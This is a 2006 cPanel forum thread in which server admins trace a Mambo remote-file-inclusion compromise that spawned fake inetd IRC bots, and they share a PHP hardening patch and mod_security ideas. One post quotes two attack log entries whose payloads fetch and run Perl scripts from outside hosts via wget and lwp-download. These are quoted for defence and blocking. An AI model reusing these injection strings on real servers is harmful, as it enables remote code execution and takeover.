The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Howto locate source of hacked server

Discussion in 'General Discussion' started by garnar, Apr 27, 2006.

  1. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    My cpanel server running :

    WHM 10.8.0 cPanel 10.8.1-R113
    Fedora i686 - WHM X v3.1.0

    has been hacked into. On boot I get this inetd service that loads up and hogs most of the cpu/ram. After time it will spawn other inetd processess run as user nobody. I am unable to locate the source of where this is started from. These are the processes:

    24668 nobody 0 26.1 0.2 inetd
    24963 nobody 0 25.5 0.2 inetd
    25017 nobody 0 25.2 0.2 inetd
    23896 nobody 0 22.9 0.2 /var/sbin/whos
    23999 nobody 0 19.9 0.2 /var/tmp/whos
    17984 nobody 0 19.6 0.2 inetd
    18311 nobody 0 19.6 0.2 inetd
    18641 nobody 0 19.3 0.2 inetd
    26543 nobody 0 19.3 0.2 inetd

    Running netstat I see this:
    tcp 0 80 cpanel.binghamXXX.XXX:36689 ircd-188.buy-a-shell.n:ircd ESTA BLISHED
    tcp 0 80 cpanel.binghamXXX.XXX:36690 ircd-188.buy-a-shell.n:ircd ESTA

    I am not running any IRC server's on this machine so I know something is wrong here. I would like to be able to locate where this fake inetd starts from and kill it. Thanks in advance for any help.
     
  2. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,472
    Likes Received:
    20
    Trophy Points:
    463
    Location:
    Go on, have a guess
    It's too broad a subject to cover the issue in a forum thread and you'd be advised to hire a security expert.

    That said, using tools such as lsof will help you track down the location of exploits:

    lsof -p 24668 | more

    After cleaning up the mess, the next major step is finding out how they got in, and that involves trawling all your web logs in:

    /usr/local/apache/logs/*
    /usr/local/apache/domlogs/*

    The process name is usually completely meaningless as any script or binary can change its name - indeed it's what they do to try and avoid detection and likely has nothing to do with inetd.
     
  3. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    Thanks for the tip, I was just looking for a few commands to tie a process to a file that I could find on the system.
     
  4. clara

    clara Member

    Joined:
    Aug 31, 2005
    Messages:
    21
    Likes Received:
    0
    Trophy Points:
    151
    I have the exact same issue, CPU runs too high because od nobody-inted proccess, and there is no way I can access any any site nor whm, nor cpanel. I have to reboot the system just to see the same thing in a few hours.
     
  5. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    This is due to a Mambo install that is not up2date. What happens is they use a php exploit to download a file from a remote server then it spawns multi fake inetd deamons that act as IRC servers/ port scanners and god knows what else. Take a look at getting your mambo sites patched. The CP script to auto install installs a version that is out of date and has know exploits for it.

    in your index.php index2.php files you need to use this code at the top. Also I suggest doing this for the index files located in the administrator dir. Additionaly you might want to passwd protect the admin dir.

    /** Set flag that this is a parent file */
    define( '_VALID_MOS', 1 );
    $protects = array('_REQUEST', '_GET', '_POST', '_COOKIE', '_FILES', '_SERVER', '_ENV', 'GLOBALS', '_SESSION');

    foreach ($protects as $protect) {
    if ( in_array($protect , array_keys($_REQUEST)) ||
    in_array($protect , array_keys($_GET)) ||
    in_array($protect , array_keys($_POST)) ||
    in_array($protect , array_keys($_COOKIE)) ||
    in_array($protect , array_keys($_FILES))) {
    die("Invalid Request.");
    }
    }
    // checks for configuration file, if none found loads installation page
     
  6. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    168
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Does anyone know the exploit URL that they use to break in via Mambo? Is this Mambo specific or does it apply to Joomla as well?

    The reason I'm asking for the exploit URLs is that we can then block them with mod_security. This saves time over going through hundreds of Mambo/Joomla sites!! :)

    Anyone know?
     
  7. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    This is what I have seen so far, I'm looking for the other host that was doing this:

    82.77.174.39 - - [15/May/2006:14:16:12 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 288

    EDIT: Heres the other one, there is one more when I find it i'll let you know

    66.197.38.94 - - [16/May/2006:03:17:19 -0400] "GET /portal/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/aubyn/tools.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.freewebs.com/aubyn/gif.txt;perl%20gif.txt;rm%20-rf%20gif*? HTTP/1.0" 404 -
     
    #7 garnar, May 17, 2006
    Last edited: May 17, 2006
  8. garnar

    garnar Member

    Joined:
    Jul 1, 2004
    Messages:
    5
    Likes Received:
    0
    Trophy Points:
    151
    Thats a good and a bad idea. You really need to make the code changes to Mambo/Joomla so this doesnt happen. Anyone can run code on your server under the user apache runs as.
     
  9. brianoz

    brianoz Well-Known Member

    Joined:
    Mar 13, 2004
    Messages:
    1,146
    Likes Received:
    6
    Trophy Points:
    168
    Location:
    Melbourne, Australia
    cPanel Access Level:
    Root Administrator
    Yes, ideally, but since Mambo/Joomla don't have an autoupdate function at the moment, this requires
    going through a whole server. A mod_security blocking rule is an instant fix, so it's a great idea and works
    well for most of the hosting population. Over time, sure, the users can go back and update their Joomla
    installations, but that's not something most of us have time to do.

    Looks like a standard mod_security rule for wget, which most people should have, will block this, but obviously it's still worth updating
    Joomla over time.

    And, if you run phpsuexec, that's only a normal user. If you run as nobody, then ... well ...
    open slather I guess! And, unless I'm confused, if you have the mod_security blocking rule,
    then nobody can use the holes anyway, so what's the problem?

    This goes back to a basic security principle which is what you were alluding to above. It's not enough to have one level of
    security - for instance, just mod_security, because if mod_security fails you're in trouble. You need two levels of security -
    updated Joomla/phpBB scripts, as well as mod_security.
     
    #9 brianoz, May 18, 2006
    Last edited: May 18, 2006
  10. linuxserverguy

    linuxserverguy Active Member

    Joined:
    Apr 14, 2005
    Messages:
    26
    Likes Received:
    0
    Trophy Points:
    151
    can you please tell whats the location to find this logs? ty.

    nevermind
     
    #10 linuxserverguy, May 23, 2006
    Last edited: May 24, 2006
Loading...

Share This Page